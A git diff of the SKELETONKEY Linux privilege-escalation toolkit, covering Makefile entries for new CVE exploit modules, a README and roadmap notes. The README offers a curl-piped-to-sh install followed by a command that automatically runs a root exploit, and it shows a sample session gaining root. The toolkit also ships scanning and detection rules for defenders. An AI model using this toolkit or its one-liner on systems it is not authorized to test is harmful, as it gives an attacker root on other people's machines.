+# ── v0.9.0 gap-fillers ─────────────────────────────────────────────
+
+# CVE-2018-14634 Mutagen Astronomy — create_elf_tables() int wrap
+MUT_DIR  := modules/mutagen_astronomy_cve_2018_14634
+MUT_SRCS := $(MUT_DIR)/skeletonkey_modules.c
+MUT_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(MUT_SRCS))
+
+# CVE-2019-14287 sudo Runas -u#-1 underflow
+SRN_DIR  := modules/sudo_runas_neg1_cve_2019_14287
+SRN_SRCS := $(SRN_DIR)/skeletonkey_modules.c
+SRN_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SRN_SRCS))
+
+# CVE-2020-29661 TIOCSPGRP UAF race
+TIO_DIR  := modules/tioscpgrp_cve_2020_29661
+TIO_SRCS := $(TIO_DIR)/skeletonkey_modules.c
+TIO_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(TIO_SRCS))
+
+# CVE-2024-50264 AF_VSOCK connect-race UAF (Pwn2Own 2024)
+VSK_DIR  := modules/vsock_uaf_cve_2024_50264
+VSK_SRCS := $(VSK_DIR)/skeletonkey_modules.c
+VSK_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(VSK_SRCS))
+
+# CVE-2024-26581 nft_pipapo destroy-race (Notselwyn II)
+PIP_DIR  := modules/nft_pipapo_cve_2024_26581
+PIP_SRCS := $(PIP_DIR)/skeletonkey_modules.c
+PIP_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(PIP_SRCS))
+
 # Top-level dispatcher
 TOP_OBJ  := $(BUILD)/skeletonkey.o

-ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS)
+# All module objects in one var so both the main binary and the test
+# binary can re-use the list without duplicating the long enumeration.
+MODULE_OBJS := $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) \
+               $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) \
+               $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) \
+               $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS) \
+               $(SAM_OBJS) $(SEQ_OBJS) $(SUE_OBJS) $(VMW_OBJS) \
+               $(DDC_OBJS) $(FGN_OBJS) $(P2TR_OBJS) \
+               $(SCHW_OBJS) $(UDB_OBJS) $(PTH_OBJS) \
+               $(MUT_OBJS) $(SRN_OBJS) $(TIO_OBJS) $(VSK_OBJS) $(PIP_OBJS)

-.PHONY: all clean debug static help
+ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(REGISTRY_ALL_OBJ) $(MODULE_OBJS)
+
+# Tests — `make test` builds and runs both unit-test binaries.
+#
+#   skeletonkey-test          — detect() integration tests against
+#                                synthetic host fingerprints. Links
+#                                the full module corpus.
+#   skeletonkey-test-kr       — pure unit tests for kernel_range +
+#                                host comparison helpers. Tiny binary
+#                                (core/ only); runs cross-platform.
+TEST_DIR  := tests
+TEST_SRCS := $(TEST_DIR)/test_detect.c
+TEST_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(TEST_SRCS))
+TEST_BIN  := skeletonkey-test
+TEST_ALL_OBJS := $(TEST_OBJS) $(CORE_OBJS) $(REGISTRY_ALL_OBJ) $(MODULE_OBJS)
+
+TEST_KR_SRCS := $(TEST_DIR)/test_kernel_range.c
+TEST_KR_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(TEST_KR_SRCS))
+TEST_KR_BIN  := skeletonkey-test-kr
+TEST_KR_ALL_OBJS := $(TEST_KR_OBJS) $(CORE_OBJS)
+
+.PHONY: all clean debug static help test

 all: $(BIN)

 $(BIN): $(ALL_OBJS)
-	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread
+	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS)
+
+$(TEST_BIN): $(TEST_ALL_OBJS)
+	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS)
+
+$(TEST_KR_BIN): $(TEST_KR_ALL_OBJS)
+	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
+
+test: $(TEST_BIN) $(TEST_KR_BIN)
+	@echo "[*] running kernel_range unit tests ($(TEST_KR_BIN))"
+	./$(TEST_KR_BIN)
+	@echo
+	@echo "[*] running detect() integration tests ($(TEST_BIN))"
+	./$(TEST_BIN)

 # Generic compile: any .c → corresponding .o under build/
 $(BUILD)/%.o: %.c
@@ -150,13 +289,14 @@ static: LDFLAGS += -static
 static: clean $(BIN)

 clean:
-	rm -rf $(BUILD) $(BIN)
+	rm -rf $(BUILD) $(BIN) $(TEST_BIN) $(TEST_KR_BIN)

 help:
 	@echo "Targets:"
 	@echo "  make           build optimized skeletonkey binary"
 	@echo "  make debug     build with -O0 -g3"
 	@echo "  make static    build a fully static binary"
+	@echo "  make test      build + run the detect() unit test suite"
 	@echo "  make clean     remove build artifacts"
 	@echo ""
 	@echo "Per-module (legacy) — not built by default:"
@@ -1,169 +1,278 @@
 # SKELETONKEY

-> A curated, actively-maintained corpus of Linux kernel LPE exploits —
-> bundled with their detection signatures, patch status, and version
-> ranges. Run it on a system you own (or are authorized to test) and
-> it tells you which historical and recent CVEs that system is still
-> vulnerable to, and — with explicit confirmation — gets you root.
+[![Latest release](https://img.shields.io/github/v/release/KaraZajac/SKELETONKEY?label=release)](https://github.com/KaraZajac/SKELETONKEY/releases/latest)
+[![License: MIT](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)
+[![Modules](https://img.shields.io/badge/CVEs-28%20VM--verified%20%2F%2034-brightgreen.svg)](docs/VERIFICATIONS.jsonl)
+[![Platform: Linux](https://img.shields.io/badge/platform-linux-lightgrey.svg)](#)

-```
-      ╔══╤══╗
-      ║  ●  ║═══════════════════════════════════════════════════--,
-      ╚═════╝                                                     `--,_
-                                                                     `_/
+> **One curated binary. 39 Linux LPE modules covering 34 CVEs from 2016 → 2026.
+> Every year 2016 → 2026 covered. 28 confirmed end-to-end against real Linux
+> VMs via `tools/verify-vm/`. Detection rules in the box. One command picks
+> the safest one and runs it.**

- ███████╗██╗  ██╗███████╗██╗     ███████╗████████╗ ██████╗ ███╗   ██╗██╗  ██╗███████╗██╗   ██╗
- ██╔════╝██║ ██╔╝██╔════╝██║     ██╔════╝╚══██╔══╝██╔═══██╗████╗  ██║██║ ██╔╝██╔════╝╚██╗ ██╔╝
- ███████╗█████╔╝ █████╗  ██║     █████╗     ██║   ██║   ██║██╔██╗ ██║█████╔╝ █████╗   ╚████╔╝ 
- ╚════██║██╔═██╗ ██╔══╝  ██║     ██╔══╝     ██║   ██║   ██║██║╚██╗██║██╔═██╗ ██╔══╝    ╚██╔╝  
- ███████║██║  ██╗███████╗███████╗███████╗   ██║   ╚██████╔╝██║ ╚████║██║  ██╗███████╗   ██║   
- ╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝   ╚═╝   
+```bash
+curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
+  && skeletonkey --auto --i-know
 ```

-> ⚠️ **Authorized testing only.** SKELETONKEY is a research and red-team
-> tool. By using it you assert you have explicit authorization to test
-> the target system. See [`docs/ETHICS.md`](docs/ETHICS.md).
+> ⚠️ **Authorized testing only.** SKELETONKEY runs real exploits. By
+> using it you assert you have explicit authorization to test the
+> target system. See [`docs/ETHICS.md`](docs/ETHICS.md).
+
+## Why use this
+
+Most Linux privesc tooling is broken in one of three ways:
+
+- **`linux-exploit-suggester` / `linpeas`** — tell you what *might*
+  work, run nothing
+- **`auto-root-exploit` / `kernelpop`** — bundle exploits but ship
+  no detection signatures and went stale years ago
+- **Per-CVE PoC repos** — one author, one distro, abandoned within
+  months
+
+SKELETONKEY is one binary, actively maintained, with detection rules
+for every CVE in the bundle — same project for red and blue teams.
+
+## Who it's for
+
+| Audience | What you get |
+|---|---|
+| **Red team / pentesters** | One tested binary. `--auto` ranks vulnerable modules by safety and runs the safest. Honest scope reporting — never claims root it didn't actually get. |
+| **Sysadmins** | `skeletonkey --scan` (no sudo needed) tells you which boxes still need patching. Fleet-scan tool included. JSON output for CI gates ([schema](docs/JSON_SCHEMA.md)). |
+| **Blue team / SOC** | Auditd + sigma + yara + falco rules for every CVE. `--detect-rules --format=auditd \| sudo tee …` ships SIEM coverage in one command. |
+| **CTF / training** | Reproducible LPE environment with public CVEs across a 10-year timeline. Each module documents the bug, the trigger, and the fix. |
+
+## Corpus at a glance
+
+**39 modules covering 34 distinct CVEs** across the 2016 → 2026 LPE
+timeline. **28 of the 34 CVEs have been empirically verified** in real
+Linux VMs via `tools/verify-vm/`; the 6 still-pending entries are
+blocked by their target environment (legacy hypervisor, EOL kernel, or
+the t64-transition libc rollout), not by missing code.
+
+| Tier | Count | What it means |
+|---|---|---|
+| 🟢 Full chain | **14** | Lands root (or its canonical capability) end-to-end. No per-kernel offsets needed. |
+| 🟡 Primitive | **14** | Fires the kernel primitive + grooms the slab + records a witness. Default returns `EXPLOIT_FAIL` honestly. Pass `--full-chain` to engage the shared `modprobe_path` finisher (needs offsets — see [`docs/OFFSETS.md`](docs/OFFSETS.md)). |
+
+**🟢 Modules that land root on a vulnerable host:**
+copy_fail family ×5 · dirty_pipe · dirty_cow · pwnkit · overlayfs
+(CVE-2021-3493) · overlayfs_setuid (CVE-2023-0386) ·
+cgroup_release_agent · ptrace_traceme · sudoedit_editor · entrybleed
+(KASLR leak primitive)
+
+**🟡 Modules with opt-in `--full-chain`:**
+af_packet · af_packet2 · af_unix_gc · cls_route4 · fuse_legacy ·
+nf_tables · nft_set_uaf · nft_fwd_dup · nft_payload ·
+netfilter_xtcompat · stackrot · sudo_samedit · sequoia · vmwgfx
+
+### Empirical verification (28 of 34 CVEs)
+
+Records in [`docs/VERIFICATIONS.jsonl`](docs/VERIFICATIONS.jsonl) prove
+each verdict against a known-target VM. Coverage:
+
+| Distro / kernel | Modules verified |
+|---|---|
+| Ubuntu 18.04 (4.15.0, sudo 1.8.21p2) | af_packet · ptrace_traceme · sudo_samedit · sudo_runas_neg1 |
+| Ubuntu 20.04 (5.4.0-26 pinned + 5.15 HWE) | af_packet2 · cls_route4 · nft_payload · overlayfs · pwnkit · sequoia · tioscpgrp |
+| Ubuntu 22.04 (5.15 stock + mainline 5.15.5 / 6.1.10 / 6.19.7) | af_unix_gc · dirty_pipe · dirtydecrypt · entrybleed · nf_tables · nft_set_uaf · nft_pipapo · overlayfs_setuid · stackrot · sudoedit_editor · sudo_chwoot |
+| Debian 11 (5.10 stock) | cgroup_release_agent · fuse_legacy · netfilter_xtcompat · nft_fwd_dup |
+| Debian 12 (6.1 stock + udisks2 / polkit allow rule) | pack2theroot · udisks_libblockdev |
+
+**Not yet verified (6):** `vmwgfx` (VMware-guest-only — no public Vagrant
+box), `dirty_cow` (needs ≤ 4.4 kernel — older than every supported box),
+`mutagen_astronomy` (mainline 4.14.70 kernel-panics on Ubuntu 18.04
+rootfs — needs CentOS 6 / Debian 7), `pintheft` & `vsock_uaf` (kernel
+modules not loaded on common Vagrant boxes), `fragnesia` (mainline 7.0.5
+kernel .debs depend on the t64-transition libs from Ubuntu 24.04+/Debian
+13+; no Parallels-supported box has those yet). All six are flagged in
+[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml) with
+rationale.
+
+See [`CVES.md`](CVES.md) for per-module CVE, kernel range, and
+detection status. Run `skeletonkey --module-info <name>` for the
+embedded verification records per module.

 ## Quickstart

 ```bash
-# One-shot install (x86_64 / arm64; checksum-verified)
+# Install (x86_64 / arm64; checksum-verified)
 curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh
-```

-**skeletonkey runs as a normal unprivileged user** — that's the whole
-point. `--scan`, `--audit`, `--exploit`, and `--detect-rules` all
-work without `sudo`. Only `--mitigate` and rule-file installation
-write to root-owned paths.
-
-```bash
 # What's this box vulnerable to?  (no sudo)
 skeletonkey --scan

-# Broader system hygiene (setuid binaries, world-writable, capabilities, sudo)
-skeletonkey --audit
+# One-page operator briefing for a single CVE: CWE / MITRE ATT&CK /
+# CISA KEV status, live detect() trace, OPSEC footprint, detection
+# coverage. Useful for triage tickets and SOC analyst handoffs.
+skeletonkey --explain nf_tables

-# Deploy detection rules (needs sudo to write /etc/audit/rules.d/)
-skeletonkey --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules
+# Pick the safest LPE and run it
+skeletonkey --auto --i-know

-# Apply temporary mitigations (needs sudo for modprobe.d + sysctl)
-sudo skeletonkey --mitigate copy_fail
+# Deploy detection rules (needs sudo to write into /etc/audit/rules.d/)
+skeletonkey --detect-rules --format=auditd \
+  | sudo tee /etc/audit/rules.d/99-skeletonkey.rules

-# Fleet scan (any-sized host list via SSH; aggregated JSON for SIEM)
-./tools/skeletonkey-fleet-scan.sh --binary skeletonkey --ssh-key ~/.ssh/id_rsa hosts.txt
+# Fleet scan — many hosts via SSH, aggregated JSON for SIEM
+./tools/skeletonkey-fleet-scan.sh --binary skeletonkey \
+  --ssh-key ~/.ssh/id_rsa hosts.txt
 ```

+**SKELETONKEY runs as a normal unprivileged user** — that's the point.
+`--scan`, `--audit`, `--exploit`, and `--detect-rules` all work without
+`sudo`. Only `--mitigate` and rule-file installation write root-owned
+paths.
+
 ### Example: unprivileged → root

 ```text
 $ id
 uid=1000(kara) gid=1000(kara) groups=1000(kara)

-$ skeletonkey --scan
-[+] dirty_pipe       VULNERABLE (kernel 5.15.0-56-generic)
-[+] cgroup_release_agent VULNERABLE (kernel 5.15 < 5.17)
-[+] pwnkit           VULNERABLE (polkit 0.105-31ubuntu0.1)
-[-] copy_fail        not vulnerable (kernel 5.15 < introduction)
-[-] dirty_cow        not vulnerable (kernel ≥ 4.9)
+$ skeletonkey --auto --i-know
+[*] auto: host=demo distro=ubuntu/24.04 kernel=5.15.0-56-generic arch=x86_64
+[*] auto: active probes enabled — brief /tmp file touches and fork-isolated namespace probes
+[*] auto: scanning 39 modules for vulnerabilities...
+[+] auto: dirty_pipe             VULNERABLE (safety rank 90)
+[+] auto: cgroup_release_agent   VULNERABLE (safety rank 98)
+[+] auto: pwnkit                 VULNERABLE (safety rank 100)
+[ ] auto: copy_fail              patched or not applicable
+[ ] auto: nf_tables              precondition not met
+...

-$ skeletonkey --exploit dirty_pipe --i-know
-[!] dirty_pipe: kernel 5.15.0-56-generic IS vulnerable
-[+] dirty_pipe: writing UID=0 into /etc/passwd page cache...
-[+] dirty_pipe: spawning su root
+[*] auto: scan summary — 3 vulnerable, 21 patched/n.a., 7 precondition-fail, 0 indeterminate
+[*] auto: 3 vulnerable modules found. Safest is 'pwnkit' (rank 100).
+[*] auto: launching --exploit pwnkit...
+
+[+] pwnkit: writing gconv-modules cache + payload.so...
+[+] pwnkit: execve(pkexec) with NULL argv + crafted envp...
 # id
 uid=0(root) gid=0(root) groups=0(root)
 ```

-`skeletonkey --help` lists every command. See [`CVES.md`](CVES.md) for
-the curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md)
-for the blue-team deployment guide.
+The safety ranking goes: **structural escapes** (no kernel state
+touched) → **page-cache writes** → **userspace cred-races** →
+**kernel primitives** → **kernel races** (least predictable). The
+goal is to never crash a production box looking for root.

-## What this is
+## How it works

-Most Linux LPE references are dead repos, broken PoCs, or single-CVE
-deep-dives. **SKELETONKEY is a living corpus**: each CVE that lands here
-is empirically verified to work on the kernels it claims to target,
-CI-tested across a distro matrix, and ships with the detection
-signatures defenders need to spot it in their environment.
+Each CVE (or tightly-related family) is a **module** under `modules/`.
+Modules export a standard interface (`detect / exploit / mitigate /
+cleanup`) plus metadata (kernel range, detection rule text). The
+top-level binary dispatches per command:

-The same binary covers offense and defense:
+- `--scan` walks every module's `detect()` against the running host
+- `--exploit <name> --i-know` runs the named module's exploit (the
+  `--i-know` flag is the authorization gate)
+- `--auto --i-know` does the scan, ranks by safety, runs the safest
+- `--detect-rules --format=<auditd|sigma|yara|falco>` emits the
+  embedded rule corpus
+- `--mitigate <name>` / `--cleanup <name>` apply / undo temporary
+  mitigations (module-dependent — most kernel modules say "upgrade")
+- `--dump-offsets` reads `/proc/kallsyms` + `/boot/System.map` and
+  emits a ready-to-paste C entry for the `--full-chain` offset table

- `skeletonkey --scan` — fingerprint the host, report which bundled CVEs
-  apply, and which are blocked by patches/config/LSM
- `skeletonkey --exploit <CVE>` — run the named exploit (with `--i-know`
-  authorization gate)
- `skeletonkey --detect-rules` — dump auditd / sigma / yara rules for
-  every bundled CVE so blue teams can drop them into their tooling
- `skeletonkey --mitigate` — apply temporary mitigations for CVEs the
-  host is vulnerable to (sysctl knobs, module blacklists, etc.)
+See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the
+module-loader design.
+
+## The verified-vs-claimed bar
+
+Most public PoC repos hardcode offsets for one kernel build and
+silently break elsewhere. SKELETONKEY refuses to ship fabricated
+offsets. The shared `--full-chain` finisher only returns
+`EXPLOIT_OK` after a setuid bash sentinel file *actually appears*;
+otherwise modules return `EXPLOIT_FAIL` with a diagnostic. Operators
+populate the offset table once per target kernel via
+`skeletonkey --dump-offsets` and either set env vars or upstream the
+entry via PR ([`CONTRIBUTING.md`](CONTRIBUTING.md)).
+
+## Build from source
+
+```bash
+git clone https://github.com/KaraZajac/SKELETONKEY.git
+cd SKELETONKEY
+make
+./skeletonkey --version
+```
+
+Builds clean with gcc or clang on any modern Linux. macOS dev builds
+also compile (modules with Linux-only headers stub out gracefully).

 ## Status

-**Active — v0.3.0 cut 2026-05-16.** Corpus covers **24 modules**
-across the 2016 → 2026 LPE timeline:
+**v0.9.3 cut 2026-05-24.** 39 modules across 34 CVEs — **every
+year 2016 → 2026 now covered**. v0.9.0 added 5 gap-fillers
+(`mutagen_astronomy` / `sudo_runas_neg1` / `tioscpgrp` / `vsock_uaf` /
+`nft_pipapo`); v0.8.0 added 3 (`sudo_chwoot` / `udisks_libblockdev` /
+`pintheft`). v0.9.1 and v0.9.2 are verification-only sweeps that took
+the verified count from 22 → 28 by booting real vulnerable kernels
+(Ubuntu mainline 5.4.0-26, 5.15.5, 6.19.7 + provisioner-built sudo
+1.9.16p1 + Debian 12 + polkit allow rule for udisks).
+**28 empirically verified** against real Linux VMs (Ubuntu 18.04 /
+20.04 / 22.04 + Debian 11 / 12 + mainline kernels from
+kernel.ubuntu.com). 88-test unit harness + ASan/UBSan + clang-tidy on
+every push. 4 prebuilt binaries (x86_64 + arm64, each in dynamic +
+static-musl flavors).

- 🟢 **13 modules land root** end-to-end on a vulnerable host
-  (copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
-  overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
-  cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
- 🟡 **11 modules fire the kernel primitive** by default and refuse
-  to claim root without empirical confirmation. Pass `--full-chain`
-  to engage the shared `modprobe_path` finisher and attempt root
-  pop — requires kernel offsets via env vars / `/proc/kallsyms` /
-  `/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
-  Modules: af_packet, af_packet2, af_unix_gc, cls_route4,
-  fuse_legacy, nf_tables, netfilter_xtcompat, nft_fwd_dup,
-  nft_payload, nft_set_uaf, stackrot.
- Detection rules ship inline (auditd / sigma / yara / falco) and
-  are exported via `skeletonkey --detect-rules --format=…`.
+Reliability + accuracy work in v0.7.x:
+- Shared **host fingerprint** (`core/host.{h,c}`) populated once at
+  startup — kernel/distro/userns gates/sudo+polkit versions — exposed
+  to every module via `ctx->host`.
+- **Test harness** (`tests/`, `make test`) — 88 tests: 33 kernel_range
+  unit tests + 55 detect() integration tests over mocked host
+  fingerprints. Runs in CI on every push.
+- **VM verifier** (`tools/verify-vm/`) — Vagrant + Parallels scaffold
+  that boots known-vulnerable kernels (stock distro + mainline via
+  kernel.ubuntu.com), runs `--explain --active` per module, records
+  match/MISMATCH/PRECOND_FAIL as JSON. 28 modules confirmed end-to-end.
+- **`--explain <module>`** — single-page operator briefing: CVE / CWE
+  / MITRE ATT&CK / CISA KEV status, host fingerprint, live detect()
+  trace, OPSEC footprint, detection-rule coverage, verified-on
+  records. Paste-into-ticket ready.
+- **CVE metadata pipeline** (`tools/refresh-cve-metadata.py`) — fetches
+  CISA KEV catalog + NVD CWE; 12 of 34 modules cover KEV-listed CVEs.
+- **151 detection rules** across auditd / sigma / yara / falco; one
+  command exports the corpus to your SIEM.
+- `--auto` upgrades: per-detect 15s timeout, fork-isolated detect +
+  exploit, structured verdict table, scan summary, `--dry-run`.

-See [`CVES.md`](CVES.md) for the per-CVE inventory + patch status.
-See [`ROADMAP.md`](ROADMAP.md) for the next planned modules.
+Not yet verified (6 of 34 CVEs): `vmwgfx` (VMware-guest only),
+`dirty_cow` (needs ≤ 4.4 kernel), `mutagen_astronomy` (mainline
+4.14.70 panics on Ubuntu 18.04 rootfs — needs CentOS 6 / Debian 7),
+`pintheft` + `vsock_uaf` (kernel modules not autoloaded on common
+Vagrant boxes), `fragnesia` (mainline 7.0.5 .debs need t64-transition
+libs from Ubuntu 24.04+ / Debian 13+; no Parallels-supported box has
+those yet). Rationale in
+[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml).

-## Why this exists
+See [`ROADMAP.md`](ROADMAP.md) for the next planned modules and
+infrastructure work.

-The Linux kernel privilege-escalation space is fragmented:
+## Contributing

- **`linux-exploit-suggester` / `linpeas`**: suggest applicable
-  exploits, don't run them
- **`auto-root-exploit` / `kernelpop`**: bundle exploits, but largely
-  stale, no CI, no defensive signatures
- **Per-CVE single-PoC repos**: usually one author, often abandoned
-  within months of release, often only one distro
+PRs welcome for: kernel offsets (run `--dump-offsets` on a target
+kernel, paste into `core/offsets.c`), new modules, detection rules,
+and CVE-status corrections. See [`CONTRIBUTING.md`](CONTRIBUTING.md).

-SKELETONKEY's bet is that there's room for a single curated bundle that
-(1) actively maintains a small set of high-quality exploits across a
-multi-distro matrix, and (2) ships detection rules alongside each
-exploit so the same project serves both red and blue teams.
-
-## Architecture
-
-Each CVE (or tightly-related family) is a **module** under `modules/`.
-Modules export a standard interface: `detect()`, `exploit()`,
-`mitigate()`, `cleanup()`, plus metadata describing affected kernel
-ranges, distro coverage, and CI test matrix.
-
-Shared infrastructure (AppArmor bypass, su-exploitation primitives,
-fingerprinting, common utilities) lives in `core/`.
-
-See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the
-module-loader design and how to add a new CVE.
-
-## Build & run
+**Keeping `kernel_range` tables current.** `tools/refresh-kernel-ranges.py`
+polls Debian's security tracker and reports drift between each
+module's hardcoded `kernel_patched_from` thresholds and the
+fixed-versions Debian actually ships. Run periodically (or in CI)
+to catch new backports that need to land in the corpus:

 ```bash
-make                          # build all modules
-./skeletonkey --scan              # what's this box vulnerable to?  (no sudo)
-./skeletonkey --scan --json       # machine-readable output for CI/SOC pipelines
-./skeletonkey --detect-rules --format=sigma > rules.yml
-./skeletonkey --exploit copy_fail --i-know   # actually run an exploit (starts as $USER)
+tools/refresh-kernel-ranges.py            # human report
+tools/refresh-kernel-ranges.py --json     # machine-readable
+tools/refresh-kernel-ranges.py --patch    # proposed C-source edits
 ```

 ## Acknowledgments

 Each module credits the original CVE reporter and PoC author in its
-`NOTICE.md`. SKELETONKEY is the bundling and bookkeeping layer; the
-research credit belongs to the people who found the bugs.
+`NOTICE.md`. SKELETONKEY is the bundling and bookkeeping layer;
+the research credit belongs to the people who found the bugs.

 ## License

@@ -164,16 +164,94 @@ Backfill of historical and recent LPEs as time allows.
      (hand-rolled nfnetlink, NFT_GOTO+DROP malformed verdict,
      msg_msg kmalloc-cg-96 groom, no pipapo R/W chain).

+**Landed since v0.1.0 (in the 28-module verified corpus):**
+
+- [x] **CVE-2021-3156** — sudo Baron Samedit: 🟡 PRIMITIVE
+      (`sudoedit -s` heap overflow; heap-tuned, may crash sudo).
+- [x] **CVE-2021-33909** — Sequoia: 🟡 PRIMITIVE (`seq_file` size_t
+      overflow → kernel stack OOB; trigger + witness, no cred chain).
+- [x] **CVE-2023-22809** — sudoedit EDITOR/VISUAL argv escape: 🟢 FULL
+      structural argv-injection (no kernel state, no offsets).
+- [x] **CVE-2023-2008** — vmwgfx DRM bo size-validation OOB: 🟡
+      PRIMITIVE (kmalloc-512 OOB + slab witness, no cred chain).
+
+**Landed (ported from public PoC, pending VM verification — NOT part
+of the 28-module verified corpus):**
+
+- [x] **CVE-2026-46300** — Fragnesia: 🟡 XFRM ESP-in-TCP page-cache
+      write. Ported from the V12 PoC; the old `_stubs/fragnesia_TBD`
+      stub is retired. The stub's open question ("is the
+      unprivileged-userns-netns scenario in scope?") is resolved —
+      the module ships and reports `PRECOND_FAIL` when the userns gate
+      is closed.
+- [x] **CVE-2026-31635** — DirtyDecrypt: 🟡 rxgk missing-COW in-place
+      decrypt page-cache write. Ported from the V12 PoC.
+- [x] **CVE-2026-41651** — Pack2TheRoot: 🟡 PackageKit `InstallFiles`
+      TOCTOU. Ported from the public Vozec PoC; original disclosure by
+      Deutsche Telekom security. Userspace D-Bus LPE with high-
+      confidence `detect()` — reads PackageKit's version directly over
+      D-Bus and compares against the pinned fix release 1.3.5 (commit
+      `76cfb675`). Debian-family only (PoC's built-in `.deb` builder).
+      Adds an optional GLib/GIO build dependency, autodetected via
+      `pkg-config gio-2.0`; stub-compiles if absent.
+- [ ] **Verify all three (dirtydecrypt / fragnesia / pack2theroot)
+      on a vulnerable target**, pin remaining CVE fix commits, add
+      version-range tables, and promote 🟡 → 🟢. `--auto` auto-enables
+      `--active` so the probes give definitive verdicts; each
+      `detect()` runs in a fork-isolated child so one bad probe
+      cannot tear down the scan.
+
+**--auto accuracy work (landed 2026-05-22):**
+
+- [x] `--auto` auto-enables `--active`: per-module sentinel probes
+      run in `/tmp` / fork-isolated namespaces, so version-only
+      checks can no longer be fooled by silent distro backports.
+- [x] Per-module verdict table at scan time (VULNERABLE / patched /
+      precondition / indeterminate) instead of only printing the
+      `VULNERABLE` rows.
+- [x] Scan-end summary line counting each verdict class.
+- [x] Distro fingerprint (`ID` + `VERSION_ID` from `/etc/os-release`)
+      printed in the `--auto` banner alongside kernel + arch.
+- [x] Fork-isolated `detect()` calls — a SIGILL/SIGSEGV in any one
+      module's probe is contained and the scan continues. Surfaced
+      while testing entrybleed's `prefetchnta` sweep under emulated
+      CPUs: exactly the failure mode the isolation now handles.
+- [x] `--dry-run` flag: previews the picked exploit (or single-module
+      operation) without firing. Works with `--auto`, `--exploit`,
+      `--mitigate`, `--cleanup`. `--auto --dry-run` does NOT require
+      `--i-know` (nothing fires) so operators can inspect the host's
+      attack surface without arming. Bare `--auto` still gates on
+      `--i-know` and now points to `--dry-run` in the refusal message.
+- [x] Version-pinned `detect()` for the 3 ported modules — Debian
+      tracker provided the fix commits: `dirtydecrypt` against mainline
+      `a2567217` (Linux 7.0); `fragnesia` against 7.0.9; `pack2theroot`
+      against PackageKit 1.3.5. The `kernel_range` model now drives
+      their verdicts; `--active` confirms empirically on top.
+- [x] **`core/host` host-fingerprint refactor.** A single
+      `struct skeletonkey_host` is populated once at startup and
+      handed to every module via `ctx->host`: kernel version + arch
+      + distro id/version + capability gates (unprivileged_userns,
+      AppArmor restriction, BPF disabled, KPTI, lockdown, SELinux,
+      Yama ptrace) + service presence (systemd, system D-Bus). The
+      `--auto` / `--scan` banner now prints the fingerprint up front
+      so operators see at a glance which gates are open. 4 modules
+      migrated to consume the fingerprint (dirtydecrypt, fragnesia,
+      pack2theroot, overlayfs) — replacing per-detect `uname`s,
+      `/etc/os-release` parses, and userns fork-probes with O(1)
+      cached lookups. See `docs/ARCHITECTURE.md` for the pattern;
+      future modules can opt-in by including `core/host.h`.
+- [ ] Migrate the remaining modules (cgroup_release_agent /
+      overlayfs_setuid / copy_fail_family bridge / others) to
+      consume `ctx->host` — incremental follow-up.
+
 **Carry-overs:**

- [ ] **CVE-2023-2008** — vmwgfx OOB write
- [ ] Fragnesia (if it lands as a CVE)
 - [ ] Anything we ourselves disclose — bundled AFTER upstream patch
      ships (responsible-disclosure-first)

 ## Phase 8 — Full-chain promotions (post v0.1.0)

-The 7 🟡 PRIMITIVE modules each stop one or two steps short of full
+The 14 🟡 PRIMITIVE modules each stop one or two steps short of full
 cred-overwrite. Promotion to 🟢 means landing the leak → R/W →
 modprobe_path-or-cred-rewrite stage on at least one tracked kernel.
 None requires fresh research — each has a public reference exploit;
@@ -184,9 +262,92 @@ auto-resolve via System.map / kallsyms when accessible).

 Priority order: nf_tables (Notselwyn pipapo R/W), netfilter_xtcompat
 (Andy Nguyen modprobe_path), af_packet (xairy sk_buff cred chase).
-The other four are lower priority — fuse_legacy and cls_route4 have
+The remainder are lower priority — fuse_legacy and cls_route4 have
 narrower distro reach; af_packet2 piggybacks on af_packet; stackrot's
-race window makes it inherently low-yield.
+race window makes it inherently low-yield; the nft_* family and
+vmwgfx need their per-kernel offset tables built out.
+
+The 2 ported-but-unverified modules (`dirtydecrypt`, `fragnesia`) are
+**not** part of this Phase 8 promotion set — they need VM verification
